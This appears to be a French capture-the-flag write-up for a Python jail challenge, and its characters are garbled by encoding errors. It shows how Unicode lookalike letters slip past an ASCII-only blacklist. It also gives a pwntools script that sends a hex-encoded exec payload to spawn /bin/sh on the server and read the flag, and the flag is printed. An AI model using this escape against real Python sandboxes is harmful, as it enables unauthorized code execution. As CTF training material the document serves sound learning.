Pyjail Revenge
Catรฉgorie: Systรจme Difficultรฉ: - Flag: CTFREI{d4mn_u_g0t_m3_pff}
Challenge
Description
Fini les payloads classiques, montre moi vraiment ce que tu peux faire pour contourner รงa !
Le flag est situรฉ dans flag.txt
Connexion: nc intro.ctfrei.fr 4452
Ce challenge tourne sur un docker et n'est pas disponible
Solution
Ici le "TRICK" ร utiliser est que python accepte diffรฉrent encodage, seulement la vรฉrification de la blacklist est faite uniquement avec les valeurs ASCII. On peut donc utiliser des caractรจres unicodes diffรฉrents, mais compris par python pour utiliser les mots interdis.
La premiรจre chose ร faire est de lister, en local, les caractรจres qui peuvent remplacer les "vrais" (ceux en ASCII). Pour รงa on va crรฉer 26 variables nommรฉes de a ร z, tester par exemple 1 million de caractรจres unicode et voir ceux qui sont รฉvaluรฉs en tant qu'une des variables dรฉfinies.
result = {v: [] for v in range(26)}
a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z = list(range(26))
for _n in range(1_000_000):
_c = chr(_n)
if _c.isdigit():
continue
try:
_v = eval(_c)
result[_v].append(_c)
except:
pass
for _v in range(26):
print(', '.join(result[_v]))On en tire le tableau de correspondances suivant :
a, ยช, แต, โ, ๏ฝ, ๐, ๐, ๐, ๐ถ, ๐ช, ๐, ๐, ๐, ๐บ, ๐ฎ, ๐ข, ๐, ๐
b, แต, ๏ฝ, ๐, ๐, ๐, ๐ท, ๐ซ, ๐, ๐, ๐, ๐ป, ๐ฏ, ๐ฃ, ๐, ๐
c, แถ, โ
ฝ, ๏ฝ, ๐, ๐, ๐, ๐ธ, ๐ฌ, ๐ , ๐, ๐, ๐ผ, ๐ฐ, ๐ค, ๐, ๐
d, แต, โ
, โ
พ, ๏ฝ, ๐, ๐, ๐
, ๐น, ๐ญ, ๐ก, ๐, ๐, ๐ฝ, ๐ฑ, ๐ฅ, ๐, ๐
e, แต, โ, โฏ, โ
, ๏ฝ
, ๐, ๐, ๐, ๐ฎ, ๐ข, ๐, ๐, ๐พ, ๐ฒ, ๐ฆ, ๐, ๐
f, แถ , ๏ฝ, ๐, ๐, ๐, ๐ป, ๐ฏ, ๐ฃ, ๐, ๐, ๐ฟ, ๐ณ, ๐ง, ๐, ๐
g, แต, โ, ๏ฝ, ๐ , ๐, ๐, ๐ฐ, ๐ค, ๐, ๐, ๐, ๐ด, ๐จ, ๐, ๐
h, สฐ, โ, โ, ๏ฝ, ๐ก, ๐, ๐ฝ, ๐ฑ, ๐ฅ, ๐, ๐, ๐, ๐ต, ๐ฉ, ๐, ๐
i, แตข, โฑ, โน, โ
, โ
ฐ, ๏ฝ, ๐ข, ๐, ๐, ๐พ, ๐ฒ, ๐ฆ, ๐, ๐, ๐, ๐ถ, ๐ช, ๐, ๐
j, สฒ, โ
, โฑผ, ๏ฝ, ๐ฃ, ๐, ๐, ๐ฟ, ๐ณ, ๐ง, ๐, ๐, ๐, ๐ท, ๐ซ, ๐, ๐
k, แต, โ, ๏ฝ, ๐ค, ๐, ๐, ๐, ๐ด, ๐จ, ๐, ๐, ๐, ๐ธ, ๐ฌ, ๐ , ๐
l, หก, โ, โ, โ
ผ, ๏ฝ, ๐ฅ, ๐, ๐, ๐, ๐ต, ๐ฉ, ๐, ๐, ๐
, ๐น, ๐ญ, ๐ก, ๐
m, แต, โ, โ
ฟ, ๏ฝ, ๐ฆ, ๐, ๐, ๐, ๐ถ, ๐ช, ๐, ๐, ๐, ๐บ, ๐ฎ, ๐ข, ๐
n, โฟ, โ, ๏ฝ, ๐ง, ๐, ๐, ๐, ๐ท, ๐ซ, ๐, ๐, ๐, ๐ป, ๐ฏ, ๐ฃ, ๐
o, ยบ, แต, โ, โด, ๏ฝ, ๐จ, ๐, ๐, ๐ธ, ๐ฌ, ๐ , ๐, ๐, ๐ผ, ๐ฐ, ๐ค, ๐
p, แต, โ, ๏ฝ, ๐ฉ, ๐, ๐, ๐
, ๐น, ๐ญ, ๐ก, ๐, ๐, ๐ฝ, ๐ฑ, ๐ฅ, ๐
q, ๏ฝ, ๐ฅ, ๐ช, ๐, ๐, ๐, ๐บ, ๐ฎ, ๐ข, ๐, ๐, ๐พ, ๐ฒ, ๐ฆ, ๐
r, สณ, แตฃ, ๏ฝ, ๐ซ, ๐, ๐, ๐, ๐ป, ๐ฏ, ๐ฃ, ๐, ๐, ๐ฟ, ๐ณ, ๐ง, ๐
s, ลฟ, หข, โ, ๏ฝ, ๐ฌ, ๐ , ๐, ๐, ๐ผ, ๐ฐ, ๐ค, ๐, ๐, ๐, ๐ด, ๐จ, ๐
t, แต, โ, ๏ฝ, ๐ญ, ๐ก, ๐, ๐, ๐ฝ, ๐ฑ, ๐ฅ, ๐, ๐, ๐, ๐ต, ๐ฉ, ๐
u, แต, แตค, ๏ฝ, ๐ฎ, ๐ข, ๐, ๐, ๐พ, ๐ฒ, ๐ฆ, ๐, ๐, ๐, ๐ถ, ๐ช, ๐
v, แต, แตฅ, โ
ด, ๏ฝ, ๐ฏ, ๐ฃ, ๐, ๐, ๐ฟ, ๐ณ, ๐ง, ๐, ๐, ๐, ๐ท, ๐ซ, ๐
w, สท, ๏ฝ, ๐ฐ, ๐ค, ๐, ๐, ๐, ๐ด, ๐จ, ๐, ๐, ๐, ๐ธ, ๐ฌ, ๐
x, หฃ, โ, โ
น, ๏ฝ, ๐ฑ, ๐ฅ, ๐, ๐, ๐, ๐ต, ๐ฉ, ๐, ๐, ๐
, ๐น, ๐ญ, ๐ก
y, สธ, ๏ฝ, ๐ฒ, ๐ฆ, ๐, ๐, ๐, ๐ถ, ๐ช, ๐, ๐, ๐, ๐บ, ๐ฎ, ๐ข
z, แถป, ๏ฝ, ๐ณ, ๐ง, ๐, ๐, ๐, ๐ท, ๐ซ, ๐, ๐, ๐, ๐ป, ๐ฏ, ๐ฃMaintenant, il suffit de remplacer une lettre de exec pour que la blacklist ne dรฉtecte plus le mot, mais qu'il soit toujours interprรฉtรฉ. Remplaรงons par exemple le premier e par ๐.
Ensuite, on va crรฉer un payload qui ouvrira un shell dans notre fonction exec. Pour passer la blacklist sans se prendre la tรชte, on va envoyer une version encodรฉe en hexa et qui sera dรฉcodรฉe sur le serveur avec bytes.fromhex.
from pwn import remote, context
context.log_level = 'error'
client = remote('intro.ctfrei.fr', 4452)
to_exec_hex = '__import__("os").system("/bin/sh")'.encode().hex()
payload = f'๐xec(bytes.fromhex(\'{to_exec_hex}\').decode())'
client.sendlineafter(b'>>> ', payload.encode())
client.sendline(b'cat flag.txt')
print(client.recvall(timeout=1))
# CTFREI{d4mn_u_g0t_m3_pff}
client.close()Derniรจre mise ร jour
Cet article vous a-t-il รฉtรฉ utile ?